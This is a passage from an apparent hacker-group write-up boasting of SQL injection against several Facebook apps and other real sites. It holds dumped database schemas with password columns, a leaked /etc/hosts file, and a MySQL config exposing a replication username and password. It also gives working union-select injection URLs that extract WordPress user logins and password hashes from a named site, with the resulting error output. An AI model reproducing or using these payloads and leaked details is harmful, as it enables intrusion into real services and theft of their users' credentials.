    13) wp_terms 14) wp_user**** 15) wp_users

    Column wp_users
    1) ID 2) user_login 3) user_pass 4) user_nicename 5) user_email
    6) user_url 7) user_registered 8) user_activation_key 9) user_status
    10) display_name

    etc...

    http://apps.facebook.com/fluff/fluffbook.php?id=[SQL Inj3ct0r]

    > ~ inj3ct0r_facebook_exploit [ENTER]

    http://apps.facebook.com/snowago/area.php?areaid=[SQL Inj3ct0r]

    Database: affinispac_fb
    User: affinispac_fb@localhost
    Version: 5.0.67-community

    http://www.chinesezodiachoroscope.com/facebook/index1.php?user_id=[SQL Inj3ct0r]

    >plucky@localhost : facebook : 4.0.13-log

    etc...
    =] Next xD

    Database: thetvdb
    User: thetvdb@localhost
    Version: 5.0.51a-24-log

    [Database]: thetvdb
    [1]aka_seriesname [2]apiusers [3]banners [4]deletions [5]genres
    [6]imgstatus [7]languages [8]mirrors [9]networks [10]ratings [11]runtimes
    [12]seriesactors [13]seriesupdates [14]translation_episodename
    [15]translation_episodeoverview [16]translation_labels
    [17]translation_seriesname [18]translation_seriesoverview [19]tvepisodes
    [20]tvseasons [21]tvseries [22]user_episodes [23]users

    users:
    id,username,userpass,emailaddress,ipaddress,userlevel,languageid,favorites,
    favorites_displaymode,bannerlimit,banneragreement,active,uniqueid,
    lastupdatedby_admin,mirrorupdate

    [userpass]

    [Database]: wiki
    [24]archive [25]categorylinks [26]externallinks [27]filearchive
    [28]hitcounter [29]image [30]imagelinks [31]interwiki [32]ipblocks [33]job
    [34]langlinks [35]logging [36]math [37]objectcache [38]oldimage [39]page
    [40]page_restrictions [41]pagelinks [42]querycache [43]querycache_info
    [44]querycachetwo [45]recentchanges [46]redirect [47]revision
    [48]searchindex [49]site_stats [50]templatelinks [51]text [52]trackbacks
    [53]transcache [54]user [55]user_groups [56]user_newtalk [57]watchlist

    user:
    user_id,user_name,user_real_name,user_password,user_newpassword,user_newpass_time,
    user_email,user_options,user_touched,user_token,user_email_authenticated,user_email_token,
    user_email_token_expires,user_registration,user_editcount

    ['user_name'] : ['user_pass']

    ---------------------------------------------------------------------------

    read /etc/hosts

    127.0.0.1 localhost localhost.localdomain
    192.168.1.167 140696-db2.flufffriends.com 140696-db2
    192.168.1.166 140695-db1.flufffriends.com 140695-db1
    192.168.1.165 140694-web2.flufffriends.com 140694-web2
    192.168.1.164 140693-web1.flufffriends.com 140693-web1
    69.63.176.141 api.facebook.com
    208.116.17.80 peanutlabs.com

    ----------------------------------

    /etc/my.cnf

    #SERVER 5 IS THE MASTER FOR DB1 AND ROMIS FOR DB1
    log-bin=/var/lib/mysqllogs/bin-log
    binlog-do-db=fluff2
    expire-logs-days=14
    server-id = 5
    #master-host=69.63.176.141
    #master-user=romis_user
    #master-password=romis0123
    #master-connect-retry=60
    replicate-do-db=miserman
    #log-slave-updates
    expire_logs_days = 14

    I think we found a sufficient number of vulnerabilities!
    ---------------------------



       __             __      __  
     /'__`\         /'__`\  /'__`\
    /\ \/\ \  __  _/\ \/\ \/\_\L\ \
    \ \ \ \ \/\ \/'\ \ \ \ \/_/_\_<_
     \ \ \_\ \/>  </\ \ \_\ \/\ \L\ \
      \ \____//\_/\_\\ \____/\ \____/
       \/___/ \//\/_/ \/___/  \/___/




    So .. moving on to the fun, friends.

    To avoid vandalism by script kiddies I will not give you a link to shell.php, but I enclose images and some interesting queries =]

    ..> Exploit start

    . + . + . + . + . + . + .

    wp_posts post_password
    wp_users user_pass

    done.....

    WordPress! oO One of the modules installed in Facebook is WordPress!

    check link:

    http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+count(*)+from+candukincaid.wp_users--+1

    oooooooooooooooooooooooooooo

    Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116

    Warning: simplexml_load_string() [function.simplexml-load-string]: </body> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116

    Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116

    Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 7: parser error : Opening and ending tag mismatch: body line 3 and html in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116

    Warning: imagepng() [function.imagepng]: Unable to open '/home/tomkincaid/tomkincaid.dreamhosters.com/tv/badges/text/ /1 and 1=2 union select count(*) from candukincaid.wp_users-- 1.png' for writing: No such file or directory in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 67

    3 <= ALERT! Users!
    =]

    Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123

    Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 124

    oooooooooooooooooooooooooooo

    ..> Crach_exploit [ENTER]

    user:

    cracker:

    see request:

    http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+concat_ws(0x3a,user_login,user_pass)+from+candukincaid.wp_users+limit+1--
    http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+concat_ws%280x3a,user_login,user_pass%29+from+candukincaid.wp_users+limit+1,1--
    http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+concat_ws%280x3a,user_login,user_pass%29+from+candukincaid.wp_users+limit+2,1--

    goOd =] Nice Hacking old school xD



       __             __   __ __
     /'__`\         /'__`\/\ \\ \
    /\ \/\ \  __  _/\ \/\ \ \ \\ \
    \ \ \ \ \/\ \/'\ \ \ \ \ \ \\ \_
     \ \ \_\ \/>  </\ \ \_\ \ \__ ,__\
      \ \____//\_/\_\\ \____/\/_/\_\_/
       \/___/ \//\/_/ \/___/    \/_/
               [Conclusion]




    There's no 100% security! Be safe my friends! Watch for vulnerabilities and promptly update!

    (Alpha zone Exploit Database)



       __             __   ______
     /'__`\         /'__`\/\  ___\
    /\ \/\ \  __  _/\ \/\ \ \ \__/
    \ \ \ \ \/\ \/'\ \ \ \ \ \___``\
     \ \ \_\ \/>  </\ \ \_\ \/\ \L\ \
      \ \____//\_/\_\\ \____/\ \____/
       \/___/ \//\/_/ \/___/  \/___/
                 [Greetz]




    Greetz all Member Alpha zone

    GoOd luck Hackers! =]

    https://www.facebook.com/AlphaZoneOfficial like us ^




//The information contained within this publication is
//supplied "as-is" with no warranties or guarantees of fitness
//of use or otherwise. Neither Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information













